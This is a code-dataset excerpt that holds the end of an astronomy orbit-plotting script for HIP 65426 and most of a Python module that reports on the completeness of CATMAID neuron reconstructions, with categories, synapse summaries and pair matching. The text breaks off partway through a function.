gravity_sep, label=\"GRAVITY\", zorder=20, color=\"hotpink\"\n)\nsep_ax.legend()\n\npa_ax.errorbar(\n epoch[sphere_mask],\n pa[sphere_mask],\n paerr[sphere_mask],\n marker=\"^\",\n color=\"purple\",\n markeredgecolor=\"purple\",\n markerfacecolor=\"white\",\n ls=\"\",\n)\npa_ax.errorbar(\n epoch[naco_mask], pa[naco_mask], paerr[naco_mask], marker=\"s\", ls=\"\", color=\"purple\"\n)\npa_ax.scatter(epoch[grav_mask], gravity_pa, zorder=20, color=\"hotpink\")\n\nl, b, w, h = cbar_ax.get_position().bounds\n# cbar_ax.set_position([l - 0.05, b, w, h])\ncbar_ax.set_position([l - 0.17, b, w, h])\n\nl, b, w, h = pa_ax.get_position().bounds\n\n\ndef confidence_ellipse(\n x, y, corr, x_unc, y_unc, ax, n_std=3.0, facecolor=\"hotpink\", alpha=1\n):\n \"\"\"\n Create a plot of the covariance confidence ellipse of *x* and *y*.\n (shamelessly stolen from matplotlib docs)\n \"\"\"\n\n # Using a special case to obtain the eigenvalues of this\n # two-dimensional dataset.\n ell_radius_x = np.sqrt(1 + corr)\n ell_radius_y = np.sqrt(1 - corr)\n ellipse = patches.Ellipse(\n (0, 0),\n width=ell_radius_x * 2,\n height=ell_radius_y * 2,\n facecolor=facecolor,\n alpha=alpha,\n zorder=20,\n )\n\n # Calculating the standard deviation of x from\n # the squareroot of the variance and multiplying\n # with the given number of standard deviations.\n scale_x = x_unc * n_std\n mean_x = x\n\n # calculating the standard deviation of y ...\n scale_y = y_unc * n_std\n mean_y = y\n\n transf = (\n transforms.Affine2D()\n .rotate_deg(45)\n .scale(scale_x, scale_y)\n .translate(mean_x, mean_y)\n )\n\n ellipse.set_transform(transf + ax.transData)\n return ax.add_patch(ellipse)\n\n\nfig.subplots_adjust(right=0.6)\nradec_ax.set_position([0.05, b, w - 0.03, 0.77])\npa_ax.set_position([l - 0.23, b, w - 0.06, h])\nsep_ax.set_position([l - 0.23, b + 0.42, w - 0.06, h])\n\nfor i in np.arange(len(grav_mask)):\n if i > 1:\n grav_ax = fig.add_axes([0.82, b, 0.1, h])\n else:\n grav_ax = fig.add_axes([0.68, b + 0.42 * i, 0.1, h])\n for n_std in [1, 2]:\n ellipse = confidence_ellipse(\n gravity_ra[i],\n gravity_dec[i],\n gravity_corr[i],\n gravity_raerr[i],\n gravity_decerr[i],\n grav_ax,\n n_std=n_std,\n alpha=1 - n_std / 4,\n )\n\n grav_ax.set_xlim(gravity_ra[i] + 0.3, gravity_ra[i] - 0.3)\n grav_ax.set_ylim(gravity_dec[i] - 0.5, gravity_dec[i] + 0.5)\n grav_ax.set_aspect(\"equal\")\n\n if i == 0 or i == 2:\n grav_ax.set_xlabel(\"$\\Delta$RA [mas]\")\n if i < 2:\n grav_ax.set_ylabel(\"$\\Delta$Dec [mas]\")\n\n for j in np.arange(len(sep_ax.lines) - 2):\n orbittracks_sep = sep_ax.lines[j].get_ydata()\n orbittracks_pa = pa_ax.lines[j].get_ydata()\n ra2plot, dec2plot = system.seppa2radec(orbittracks_sep, orbittracks_pa)\n grav_ax.plot(ra2plot, dec2plot, color=\"lightgrey\")\n grav_ax.text(\n gravity_ra[i] + 0.27, gravity_dec[i] + 0.4, \"Epoch {}\".format(i + 1)\n )\n\npa_ax.set_xlabel(\"Epoch [year]\")\nradec_ax.set_aspect(\"equal\")\nplt.savefig(\"{}/orbit.png\".format(savedir), dpi=250)\n","repo_name":"sblunt/hip65426","sub_path":"fit_orbit.py","file_name":"fit_orbit.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29534216978","text":"import catalysis.catmaid_interface as ci\nimport catalysis.neurons as na\nimport catalysis.pynblast as pynblast\n\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom numpy import NaN\n\ndef root_is_soma( nrn ):\n \"\"\"\n Check that a neuron's root is tagged 'soma' and no other 
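`confidence_ellipse` in the hip65426 record above stretches a unit circle by `sqrt(1 ± corr)` and rotates it 45 degrees; those radii are exactly the square roots of the eigenvalues of a 2x2 correlation matrix, which a quick numpy check confirms:

```python
import numpy as np

corr = 0.6
cov = np.array([[1.0, corr], [corr, 1.0]])
eigvals = np.linalg.eigvalsh(cov)      # ascending: [1 - corr, 1 + corr]
radii = np.sqrt(eigvals)
assert np.allclose(radii, [np.sqrt(1 - corr), np.sqrt(1 + corr)])
```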
node is tagged\n similarly.\n\n Parameters\n ----------\n nrn : Neuron object.\n Neuron to test\n\n Returns\n ----------\n Boolean\n True if root is soma, false otherwise.\n \"\"\"\n val = False\n if 'soma' in nrn.tags.keys():\n if len(nrn.tags['soma']) == 1:\n if nrn.tags['soma'][0] == nrn.root:\n val = True\n\n if 'to nerve' in nrn.tags.keys():\n if len(nrn.tags['to nerve']) == 1:\n if nrn.tags['to nerve'][0] == nrn.root:\n val = True\n\n return val\n\ndef open_ends( nrn, include_uncertain = True ):\n \"\"\"\n Check that end nodes fall into the appropriate 'blessed' tags.\n Parameters\n ----------\n nrn : Neuron object\n Neuron to test\n\n include_uncertain : Boolean (Default : True)\n Boolean variable associated with whether to include \"uncertain ends\"\n and \"uncertain continuation\" in the statistics.\n\n Returns\n ----------\n double\n Fraction of open ends that are tagged complete.\n\n int\n Number of open ends.\n\n int\n Number of total ends.\n\n \"\"\"\n if include_uncertain:\n blessed_tags = ['ends',\n 'soma',\n 'not a branch',\n 'uncertain end',\n 'uncertain continuation']\n else:\n blessed_tags = ['ends',\n 'soma',\n 'not a branch']\n\n open_end_nodes = set( nrn.find_end_nodes() )\n num_ends = len(open_end_nodes)\n\n for tag in blessed_tags:\n if tag in nrn.tags.keys():\n open_end_nodes.difference_update( set(nrn.tags[tag]) )\n\n rem_ends = len(open_end_nodes)\n frac_open = (rem_ends+0.0) / (num_ends + 0.0)\n return frac_open, rem_ends, num_ends\n\ndef fragment_test( nrn ):\n \"\"\"\n A fragment is defined as having no soma\n \"\"\"\n if 'soma' in nrn.tags.keys() or 'to nerve' in nrn.tags.keys():\n return False\n else:\n return True\n\ndef property_summary_exact( nrns ):\n \"\"\"\n Generate a readable table summarizing the completeness of reconstruction for\n a group of neurons.\n Parameters\n ----------\n nrns : NeuronDictObject\n Collection of neurons to analyze\n\n Returns\n ----------\n DataFrame\n Data frame describing completeness of neurons\n \"\"\"\n\n ids = [nrn.id for nrn in nrns]\n names = [nrn.name for nrn in nrns]\n fraction_open_ends = [ open_ends(nrn)[0] for nrn in nrns]\n num_open_ends = [ open_ends(nrn)[1] for nrn in nrns]\n num_ends = [open_ends(nrn)[2] for nrn in nrns]\n correct_root = [ root_is_soma(nrn) for nrn in nrns ]\n node_count = [ nrn.node_count() for nrn in nrns ]\n is_fragment = [ fragment_test(nrn) for nrn in nrns ]\n dat = { 'names':names,\n 'fraction_open_ends':fraction_open_ends,\n 'num_open_ends':num_open_ends,\n 'total_ends':num_ends,\n 'rooted_at_soma':correct_root,\n 'node_count':node_count,\n 'is_fragment':is_fragment}\n\n if nrns.CatmaidInterface is not None:\n review_status = nrns.CatmaidInterface.get_review_status(ids)\n rev_frac = [ (review_status[str(id)][1]+0.0)\n / (review_status[str(id)][0]+0.0) for id in ids ]\n dat['review_fraction'] = rev_frac\n return pd.DataFrame(dat, index=ids)\n\ndef property_summary_estimated( ids, CatmaidInterface ):\n \"\"\"\n A thinner version of property_summary_exact that only retrieves specific\n relevent info, but only approximates total number of end nodes and is\n thus faster than completeness_summary_exact.\n\n Parameters\n ----------\n ids : list of ids\n Ids for neurons to query completeness for.\n\n CatmaidInterface : CatmaidDataInterface\n CatmaidDataInterface for a specific project.\n\n Returns\n -------\n DataFrame\n DataFrame describing the completeness status of neurons\n\n \"\"\"\n namedict = CatmaidInterface.get_neuron_names( ids )\n names = {int(id) : namedict[id] for id in 
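`open_ends` above is essentially set subtraction: start from every end node, remove the ones carrying a "blessed" tag, and report what is left. A self-contained miniature with a toy tags dict shaped like `Neuron.tags`:

```python
end_nodes = {1, 2, 3, 4}
tags = {"ends": [1], "not a branch": [2], "TODO": [3]}
blessed = ["ends", "soma", "not a branch", "uncertain end", "uncertain continuation"]

remaining = set(end_nodes)
for tag in blessed:
    remaining -= set(tags.get(tag, []))

print(remaining, len(remaining) / len(end_nodes))  # {3, 4} 0.5
```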
namedict}\n fraction_open_ends = []\n num_open_ends = []\n num_ends = []\n correct_root = []\n node_count = []\n is_fragment = []\n\n for id in ids:\n noe = len( CatmaidInterface.get_open_ends( id ) )\n nce = len( CatmaidInterface.get_closed_ends( id ) )\n sn = CatmaidInterface.tag_query_for_skeleton( id, '^soma$|^out to nerve$')\n rn = CatmaidInterface.root_for_skeleton( id )['root_id']\n fraction_open_ends.append( (noe+0.0)/(noe+nce+0.0) )\n num_open_ends.append( noe )\n num_ends.append( noe+nce )\n if rn in sn:\n correct_root.append( True )\n else:\n correct_root.append( False )\n node_count.append( CatmaidInterface.node_count( id )['count'] )\n if len(sn) == 0:\n is_fragment.append( True )\n else:\n is_fragment.append( False )\n\n dat = { 'names':names,\n 'fraction_open_ends':fraction_open_ends,\n 'num_open_ends':num_open_ends,\n 'total_ends':num_ends,\n 'rooted_at_soma':correct_root,\n 'node_count':node_count,\n 'is_fragment':is_fragment}\n\n review_status = CatmaidInterface.get_review_status(ids)\n rev_frac = [ (review_status[str(id)][1]+0.0)\n / (review_status[str(id)][0]+0.0) for id in ids ]\n dat['review_fraction'] = rev_frac\n\n return pd.DataFrame(dat, index=ids)\n\ndef completion_categories( property_summary = None,\n completeness_threshold = 0.97,\n review_threshold = 0.97 ):\n \"\"\"\n Returns a dict describing which neurons belong to which completeness\n categories. This takes a property summary as its input.\n\n Parameters\n ----------\n property_summary : DataFrame\n A property summary from either property_summary_exact or\n property_summary_estimated.\n\n completeness_threshold : float (optional, default = 0.97)\n The mininum fraction of complete end nodes a neuron must have to be\n considered complete.\n\n review_threshold : float (optional, default = 0.97)\n The minimum fraction of reviewed nodes a neuron must have to be\n considered reviewed.\n\n Returns\n -------\n dict\n Dict of categories (keys), with values being a list of ids.\n Categories are:\n Untraced : Only a single untagged node.\n Incomplete Fragment : Fragment (no soma) with open ends (presumed unfinished)\n Complete Fragment : Fragment with no more open ends (presumed attempted and failed)\n Incomplete Neuron : Neuron (unique soma), but open ends.\n Complete Neuron : Neuron with no open ends.\n Reviewed Complete Neuron : Neuron with no open ends and substantially reviewed. 
(if include_reviewed = True)\n \"\"\"\n\n categories = {'Untraced':[],\n 'Incomplete fragment':[],\n 'Complete fragment':[],\n 'Incomplete neuron':[],\n 'Complete neuron':[],\n 'Reviewed complete neuron':[]\n }\n\n if property_summary is not None:\n for id in property_summary.index.values:\n if property_summary.loc[id]['node_count'] == 1:\n categories['Untraced'].append(id)\n elif property_summary.loc[id]['is_fragment']:\n if property_summary.loc[id]['fraction_open_ends'] <= 1-completeness_threshold:\n categories['Complete fragment'].append(id)\n else:\n categories['Incomplete fragment'].append(id)\n elif property_summary.loc[id]['fraction_open_ends'] > 1-completeness_threshold:\n categories['Incomplete neuron'].append(id)\n elif property_summary.loc[id]['review_fraction'] >= review_threshold:\n categories['Reviewed complete neuron'].append(id)\n else:\n categories['Complete neuron'].append(id)\n return categories\n\n\ndef category_summary( categories, syn_df=None, as_df = True, nans=False ):\n \"\"\"\n For a given categorization and synaptic connectivity table, summarize\n cateogries by number and synaptic count.\n\n Parameters\n ----------\n categories : dict\n Dict keyed by category name with values being lists of neuron ids.\n\n syn_df : dataframe (optional, default is None)\n DataFrame representing a table of synaptic connectivity formated like in\n synaptic_partner_tables.\n\n as_df : Boolean (optional, default is True)\n Determines if the response is a dataframe or remains a dict.\n\n nans : Boolean (optional, default is False)\n Returns only nans. Useful to generate reports that have the right shape,\n but no data.\n\n Returns\n ----------\n DataFrame (or dict, if as_df=False)\n DataFrame indexed by categories, with columns being number of neurons\n and synapses.\n\n \"\"\"\n\n ids_cat = set( [item for sublist in [categories[cat] for cat in categories]\n for item in sublist if item is not None] )\n if syn_df is not None:\n # Remove any None objects that could happen in case of\n # connector with no other annotation\n ids_syn = set( filter( None.__ne__, syn_df.index.values ) ) \n if ids_cat != ids_syn:\n print(ids_cat)\n print(ids_syn)\n raise ValueError(\"IDs in categories and dataframe must be the same\")\n\n cat_by_syn = {}\n cat_by_num = {}\n for cat in categories:\n if nans:\n cat_by_num[cat] = NaN\n cat_by_syn[cat] = NaN\n elif len( categories[cat] ) > 0:\n if syn_df is not None:\n cat_by_syn[cat] = syn_df.loc[ categories[cat] ].sum().sum()\n else:\n cat_by_syn[cat] = NaN\n cat_by_num[cat] = len( categories[cat] )\n else:\n if syn_df is not None:\n cat_by_syn[cat] = 0\n else:\n cat_by_syn[cat] = NaN\n cat_by_num[cat] = 0\n\n if as_df:\n return pd.DataFrame(\n {'Synapses': cat_by_syn,'Number':cat_by_num} ).reindex(\n ['Untraced',\n 'Incomplete fragment',\n 'Incomplete neuron',\n 'Complete fragment',\n 'Complete neuron',\n 'Reviewed complete neuron'] )\n else:\n return cat_by_syn, cat_by_num\n\ndef category_summary_from_neurons( nrns, estimate_partner_completion = True, include_presynaptic = False, include_postsynaptic = False, max_neurons_per_post = 50 ):\n \"\"\"\n Generate category reports about neurons and their partners from a list of neurons.\n\n Parameters\n ----------\n nrns : NeuronList\n NeuronList forming the basis for the category summary.\n\n estimate_partner_completion : Boolean (default is True)\n If properties of partners are computed, this value determines if the estimated or the exact property function is used.\n\n include_presynaptic : Boolean (default is 
False)\n        Determines if an estimate of the properties of the presynaptic neurons is included.\n\n    include_postsynaptic : Boolean (default is False)\n        Determines if an estimate of the properties of the postsynaptic neurons is included.\n\n    as_df : Boolean (default is True)\n        Determines if the result is returned as a DataFrame or a dict.\n\n    Returns\n    -------\n    dict\n        Dict with keys 'Base', 'Inputs', and 'Outputs', each containing the results of category_summary on the main list of neurons,\n        the collection of presynaptic neurons (Inputs), or the collection of postsynaptic neurons (Outputs)\n    \"\"\"\n\n    main_cats = completion_categories( property_summary_exact( nrns ) )\n    main_report = category_summary(main_cats)\n\n    input_df, output_df = na.synaptic_partner_tables( nrns, include_presynaptic=include_presynaptic, include_postsynaptic=include_postsynaptic )\n    if include_presynaptic:\n        print( ' Computing presynaptic categories...')\n        pre_ids = [id for id in input_df.index.values if id is not None]\n        if estimate_partner_completion:\n            input_neurons = na.NeuronList.from_id_list( pre_ids, nrns.CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n            input_cats = completion_categories( property_summary_exact( input_neurons ) )\n        else:\n            input_cats = completion_categories( property_summary_estimated( pre_ids, nrns.CatmaidInterface ) )\n        input_report = category_summary(input_cats, input_df)\n\n    else:\n        input_report = category_summary( main_cats, nans = True )\n\n    if include_postsynaptic:\n        print( ' Computing postsynaptic categories...')\n        post_ids = [id for id in output_df.index.values if id is not None]\n        if estimate_partner_completion:\n            output_neurons = na.NeuronList.from_id_list( post_ids, nrns.CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n            output_cats = completion_categories( property_summary_exact( output_neurons ) )\n        else:\n            output_cats = completion_categories( property_summary_estimated( post_ids, nrns.CatmaidInterface ) )\n        output_report = category_summary(output_cats, output_df)\n    else:\n        output_report = category_summary( main_cats, nans = True )\n\n    report = {'Base': main_report, 'Inputs': input_report, 'Outputs': output_report }\n    return report\n\ndef completeness_report( CatmaidInterface,\n                         annos = [],\n                         id_list = [],\n                         estimate_partner_completion = True,\n                         include_presynaptic = False,\n                         include_postsynaptic = False,\n                         complete_categories = None,\n                         max_neurons_per_post = 50):\n    \"\"\"\n    Build a report on a set of neurons from annotations or ids, pulling them from a Catmaid instance.\n\n    Parameters\n    ----------\n    CatmaidInterface : CatmaidDataInterface\n        Interface for the catmaid instance to use.\n\n    annos : list of strings or ints (optional, default is [])\n        List of annotation ids or names to query.\n\n    id_list : list of ints (optional, default is [])\n        List of Neuron ids to query.\n\n    estimate_partner_completion : Boolean (default = True)\n        Boolean value selecting whether partners have estimated or exact completeness.\n\n    include_presynaptic : Boolean (default = False)\n        Determines whether the set of presynaptic neurons are queried or not.\n\n    include_postsynaptic : Boolean (default = False)\n        Determines whether the set of postsynaptic neurons are queried or not.\n\n    complete_categories : List of strings (optional, default = None)\n        Overrides the default categories that are considered 'complete'.\n\n    Returns\n    -------\n    DataFrame\n        DataFrame summarizing the completion status of neurons and, if desired, the set of partners.\n    \"\"\"\n    if isinstance(annos, str):\n        annos = [annos]\n\n    if len(id_list) > 0 and len(annos) > 0:\n        id_tag = ' and Specified Ids'\n    elif len(id_list) > 0 and len(annos)==0:\n        id_tag = ', '.join( str(nid) for nid in id_list )\n    else:\n        id_tag = ''\n    if len(annos) > 1:\n        anno_tag = ' and '.join( str(a) for a in annos )\n    elif len(annos) > 0:\n        anno_tag = str( annos[0] )\n    else:\n        anno_tag = ''\n    anno_name = anno_tag + id_tag\n\n    id_list = list( set( id_list + CatmaidInterface.get_ids_from_annotations(annos, flatten=True) ) )\n    nrns = na.NeuronList.from_id_list( id_list, CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n    # forward the partner-completion options, which were previously dropped\n    cats = category_summary_from_neurons( nrns, estimate_partner_completion = estimate_partner_completion, include_presynaptic = include_presynaptic, include_postsynaptic = include_postsynaptic, max_neurons_per_post = max_neurons_per_post )\n\n    return report_from_summary( cats, complete_categories=complete_categories, anno_name=anno_name )\n\ndef report_from_summary( category_summary, complete_categories = None, anno_name=None):\n    \"\"\"\n    Given a category summary, generate a report DataFrame.\n\n    Parameters\n    ----------\n    category_summary : Dict\n        Dict coming out of category_summary_from_neurons\n\n    complete_categories : List of str\n        Overriding list of categories to be considered complete.\n\n    anno_name : string\n        Name describing the group, for cosmetic use in the dataframe.\n\n    Returns\n    -------\n    DataFrame\n        DataFrame summarizing completion status.\n    \"\"\"\n    if complete_categories is None:\n        complete_categories = ['Complete fragment', 'Complete neuron', 'Reviewed complete neuron']\n    if anno_name is None:\n        anno_name = 'Group'\n\n    base_complete, base_inc, base_frac, base_complete_syn, base_frac_syn = _report_categories( category_summary['Base'], complete_categories=complete_categories )\n    input_complete, input_inc, input_frac, input_complete_syn, input_frac_syn = _report_categories( category_summary['Inputs'], complete_categories=complete_categories )\n    output_complete, output_inc, output_frac, output_complete_syn, output_frac_syn = _report_categories( category_summary['Outputs'], complete_categories=complete_categories )\n\n    num_master = {anno_name:base_complete, 'Inputs':input_complete, 'Outputs':output_complete}\n\n    inc_master = {anno_name:base_inc,\n                  'Inputs':input_inc,\n                  'Outputs':output_inc }\n\n    frac_master = {anno_name: base_frac,\n                   'Inputs': input_frac,\n                   'Outputs': output_frac}\n\n    num_master_syn = {anno_name:base_complete_syn, 'Inputs':input_complete_syn, 'Outputs':output_complete_syn}\n\n    frac_master_syn = {anno_name:base_complete_syn / sum(category_summary['Base'].Synapses),\n                       'Inputs': input_complete_syn / sum(category_summary['Inputs'].Synapses),\n                       'Outputs': output_complete_syn / sum(category_summary['Outputs'].Synapses)}\n    return pd.DataFrame({'Number Complete':num_master, 'Number Incomplete': inc_master, 'Fraction Complete':frac_master,\n                         'Synapses Complete':num_master_syn, 'Fraction Synapses Complete':frac_master_syn})\n\n\ndef _report_categories( dat, complete_categories ):\n    \"\"\"\n    Compute needed details of categories to generate report.\n    \"\"\"\n    comp_num = sum( [ dat.Number[cat] for cat in complete_categories] )\n    incomp_num = sum( dat.Number ) - comp_num\n    frac_num = comp_num / sum(dat.Number)\n    comp_syn = sum( [ dat.Synapses[cat] for cat in complete_categories] )\n    frac_syn = comp_syn / sum(dat.Synapses)\n    return comp_num, incomp_num, frac_num, comp_syn, frac_syn\n\ndef match_groups( id_list1, id_list2, match_via, CatmaidInterface, anno_reference='names' ):\n    \"\"\"\n    Given two lists of neurons, match their elements if they share an annotation (such as cell type) indicated by a specific metaannotation.\n\n    Parameters\n    ----------\n    id_list1 : list of ints\n        List of skeleton ids in the first group\n\n    id_list2 : list of ints\n        List of skeleton ids in the second group\n\n    match_via : string or int\n        Annotation (as name or id) that annotates the annotations to match.\n\n    CatmaidInterface : CatmaidDataInterface\n        Interface for the Catmaid instance to query.\n\n    anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n    Returns\n    -------\n    dict\n        Match report, indexed by annotation name or id.\n    \"\"\"\n    annos_with_meta = set(CatmaidInterface.get_annotations_from_meta_annotations( match_via, flatten=True ) )\n    annos1 = { id: set(CatmaidInterface.get_annotations_for_objects( [id] )).intersection(annos_with_meta) for id in id_list1}\n    annos2 = { id: set(CatmaidInterface.get_annotations_for_objects( [id] )).intersection(annos_with_meta) for id in id_list2}\n\n    matches = {}\n    for id1 in annos1:\n        for id2 in annos2:\n            for anno_id in annos1[id1].intersection(annos2[id2]):\n                if anno_reference == 'ids':\n                    matches[anno_id] = [id1, id2]\n                elif anno_reference == 'names':\n                    matches[ CatmaidInterface.parse_annotation_list(anno_id, output='names')[0] ] = [id1, id2]\n\n    return matches\n\ndef match_report( id_list1, id_list2, match_via, CatmaidInterface, name1='Group 1', name2='Group 2', anno_reference = 'names', skip_annos=None, show_completeness=True ):\n    \"\"\"\n    Given two lists of neurons, match their elements if they share an annotation (such as cell type) indicated by a specific metaannotation.\n\n    Parameters\n    ----------\n    id_list1 : list of ints\n        List of skeleton ids in the first group\n\n    id_list2 : list of ints\n        List of skeleton ids in the second group\n\n    match_via : string or int\n        Annotation (as name or id) that annotates the annotations to match.\n\n    CatmaidInterface : CatmaidDataInterface\n        Interface for the Catmaid instance to query.\n\n    name1 : string (Default is 'Group 1')\n        Label for the first group.\n\n    name2 : string (Default is 'Group 2')\n        Label for the second group.\n\n    anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n    skip_annos : list of strings (optional, Default is None)\n        List of annotations of neurons to not include in the final report.\n\n    Returns\n    -------\n    DataFrame\n        Organized, readable match report\n\n    \"\"\"\n    if skip_annos is not None:\n        ids_to_skip = CatmaidInterface.get_ids_from_annotations(skip_annos, flatten=True)\n        id_list1 = list( set(id_list1).difference(set(ids_to_skip)))\n        id_list2 = list( set(id_list2).difference(set(ids_to_skip)))\n\n    annos = CatmaidInterface.get_annotations()\n    rev_dict = { annos[key] : key for key in annos }\n\n    matches = match_groups( id_list1, id_list2, match_via, CatmaidInterface )\n    matched = [[],[]]\n    match_report1 = {}\n    match_report2 = {}\n    for anno in matches:\n        if isinstance(anno, int):\n            #anno_name = annos[anno_id] + ' (' + str(anno_id) + ')'\n            anno_name = rev_dict[anno] + ' (' + str(anno) + ')'\n        else:\n            anno_name = anno\n        matched[0].append( matches[anno][0] )\n        matched[1].append( matches[anno][1] )\n        match_report1[ anno_name ] = matches[anno][0]\n        match_report2[ anno_name ] = matches[anno][1]\n\n    unmatched1 = set(id_list1).difference( set(match_report1.values()) )\n    unmatched2 = set(id_list2).difference( set(match_report2.values()) )\n    match_report1['Unmatched'] = list(unmatched1)\n    match_report2['Unmatched'] = list(unmatched2)\n\n    if show_completeness:\n        ps = property_summary_estimated(id_list1+id_list2, CatmaidInterface )\n        match_completed1 = _match_completed(ps, match_report1 )\n        match_completed2 = _match_completed(ps, match_report2 )\n        report = pd.DataFrame( { name1: match_report1, name2: match_report2, name1+'_complete':match_completed1, name2+'_complete':match_completed2} )\n    else:\n        report = pd.DataFrame( { name1: match_report1, name2: match_report2 } )\n\n    return report\n\ndef _match_completed( ps, match_report, min_open_ends=0.05 ):\n    match_completed = dict()\n    for lin in match_report:\n        if isinstance( match_report[lin], np.integer ):\n            relids = [match_report[lin]]\n        else:\n            relids = match_report[lin]\n        match_completed[lin] = []\n        for skid in relids:\n            if not ps[ps.index==skid]['is_fragment'].bool() and (ps[ps.index==skid]['fraction_open_ends'] < min_open_ends).bool():\n                match_completed[lin].append(True)\n            else:\n                match_completed[lin].append(False)\n    return match_completed\n\ndef match_report_from_annos( anno1, anno2, match_via, CatmaidInterface, anno_reference = 'names', skip_annos = None, show_completeness=False):\n    \"\"\"\n    Given two lists of neurons, match their elements if they share\n    an annotation (such as cell type) indicated by a specific\n    metaannotation.\n\n    Parameters\n    ----------\n    anno1 : string\n        Name of the annotation to query for group 1.\n\n    anno2 : string\n        Name of the annotation to query for group 2.\n\n    match_via : string or int\n        Annotation (as name or id) that annotates the annotations to\n        match.\n\n    CatmaidInterface : CatmaidDataInterface\n        Interface for the Catmaid instance to query.\n\n    anno_reference : 'names' or 'ids' (optional, default is 'names')\n        Determines how annotations are referred to, either as strings or\n        ids.\n\n    Returns\n    -------\n    DataFrame\n        Organized, human-readable match report\n\n    \"\"\"\n    return match_report( CatmaidInterface.get_ids_from_annotations(anno1,flatten=True),\n                         CatmaidInterface.get_ids_from_annotations(anno2,flatten=True),\n                         match_via,\n                         CatmaidInterface,\n                         skip_annos=skip_annos,\n                         name1 = anno1,\n                         name2 = anno2,\n                         show_completeness=show_completeness)\n\ndef report_from_annotation_list( anno_list, CatmaidInterface ):\n    \"\"\"\n    Generate a completeness report on every annotation in a list of annotations.\n\n    Parameters\n    ----------\n    anno_list : list of ids or strings\n        Annotations to query\n\n    CatmaidInterface : CatmaidDataInterface\n        Interaction object for a catmaid instance.\n\n    Returns\n    -------\n    DataFrame\n        DataFrame completion report where each row corresponds to an annotation.\n    \"\"\"\n    meta_rep = pd.DataFrame(columns = ['Number Complete','Number Incomplete','Fraction Complete','Synapses Complete','Fraction Synapses Complete'])\n\n    for anno in anno_list:\n        rep = completeness_report( CatmaidInterface=CatmaidInterface, annos=[anno] )\n        # DataFrame.append was removed in pandas 2.0; concatenate the one-row frame instead\n        meta_rep = pd.concat( [meta_rep, rep.iloc[[0]]] )\n    return meta_rep[['Fraction Complete','Number Complete','Number Incomplete']]\n\ndef report_from_meta( meta, CatmaidInterface):\n    \"\"\"\n    Generate a completeness report based on a meta-annotation.\n\n    Parameters\n    ----------\n    meta : string or id.\n        Meta-annotation for which to generate the report.\n\n    CatmaidInterface : CatmaidDataInterface\n        Interaction object for a catmaid instance.\n\n    Returns\n    -------\n    DataFrame\n        Report for the annotations within the meta-annotation.\n    \"\"\"\n    anno_list = CatmaidInterface.get_annotations_from_meta_annotations(\n        meta, flatten=True )\n    anno_names = CatmaidInterface.parse_annotation_list(anno_list,\n        output='names')\n    return report_from_annotation_list( anno_names, CatmaidInterface )\n\ndef assert_pair( nrn_ids, pair_meta, CatmaidInterface ):\n    \"\"\"\n    Use an id-based annotation with a pair-specifying meta-annotation to\n    establish hemilateral pairs in CATMAID.\n\n    While nrn_ids will usually be a pair, we have to account for the\n    cases where there are multiple indistinguishable neurons (e.g.\n    broad LNs). Naming order will be numerical, since this approach doesn't\n    have a unique left/right ordering.\n    \"\"\"\n\n    # Check to see if neurons are already in a pair\n    all_pair_annos = set(CatmaidInterface.get_annotations_from_meta_annotations(\n        pair_meta, flatten=True ) )\n    nrn_annos = set( CatmaidInterface.get_annotations_for_objects(\n        nrn_ids ) )\n\n    if len( all_pair_annos.intersection( nrn_annos ) ) > 0:\n        for nrn_id in nrn_ids:\n            specific_nrn_annos = set( CatmaidInterface.get_annotations_for_objects(\n                [ nrn_id ] ) )\n            if len( specific_nrn_annos.intersection( all_pair_annos ) ) > 0:\n                print( \"Neuron with id {} is already paired!\".format(nrn_id) )\n    else:\n        if len(nrn_ids) < 4:\n            pair_name = 'hemilateral_pair' + ''.join(\n                ['_{}'.format(nid) for nid in sorted(nrn_ids)])\n        else:\n            pair_name = 'hemilateral_pair' + ''.join(\n                ['_{}'.format(nid) for nid in sorted(nrn_ids[0:4])])+'_etc'\n\n        d = CatmaidInterface.add_annotation(annotation_list=[pair_name],\n                                            id_list=nrn_ids,\n                                            meta_list=pair_meta)\n        if len(d['new_annotations'])==0:\n            print('Warning! No new annotations created!')\n            print(d['message'])\n    return\n\ndef is_matched( nrn_ids, pair_meta, CatmaidInterface ):\n    \"\"\"\n    Return a dict mapping each skeleton id in nrn_ids to True if it already\n    carries a pairing annotation under pair_meta, and False otherwise.\n    \"\"\"\n    annos_with_meta = CatmaidInterface.get_annotations_from_meta_annotations( pair_meta, flatten=True )\n    ids_matched = CatmaidInterface.get_ids_from_annotations(annos_with_meta, flatten=True)\n    has_match = {}\n    for skid in nrn_ids:\n        if skid in ids_matched:\n            has_match[skid] = True\n        else:\n            has_match[skid] = False\n    return has_match\n\ndef matched_complete_report( anno_list, pair_meta, CatmaidInterface, max_open_ends=0.03, min_nodes = 500 ):\n    \"\"\"\n    For each annotation group in anno_list, tally left- and right-side neurons\n    by completeness (open ends and node count) and by whether they are matched.\n    \"\"\"\n    anno_names = []\n    left_incom = []\n    left_com = []\n    left_incom_match = []\n    left_com_match = []\n    left_total = []\n\n    right_incom = []\n    right_com = []\n    right_incom_match = []\n    right_com_match = []\n    right_total = []\n\n    for anno in anno_list:\n        if len(anno_list[anno]) < 2:\n            continue\n        else:\n            print(anno)\n            anno_names.append(anno)\n\n            nrns_left_ids = CatmaidInterface.get_ids_from_annotations(\n                anno_list[anno]['l'],\n                flatten=True )\n\n            is_matched_left = is_matched( nrns_left_ids, pair_meta, CatmaidInterface )\n            props_left = property_summary_estimated( nrns_left_ids, CatmaidInterface )\n            props_left['is_matched'] = pd.Series(is_matched_left)\n            lincom, lincom_match, lcom, lcom_match = _match_category_helper(\n                props_left,\n                max_open_ends=max_open_ends,\n                min_nodes=min_nodes )\n\n            left_incom.append( lincom )\n            left_incom_match.append( lincom_match )\n            left_com.append( lcom )\n            left_com_match.append( lcom_match )\n            left_total.append( lincom+lincom_match+lcom+lcom_match )\n\n            nrns_right_ids = CatmaidInterface.get_ids_from_annotations(\n                anno_list[anno]['r'],\n                flatten=True )\n\n            is_matched_right = is_matched( nrns_right_ids, pair_meta, CatmaidInterface )\n            props_right = property_summary_estimated( nrns_right_ids, CatmaidInterface 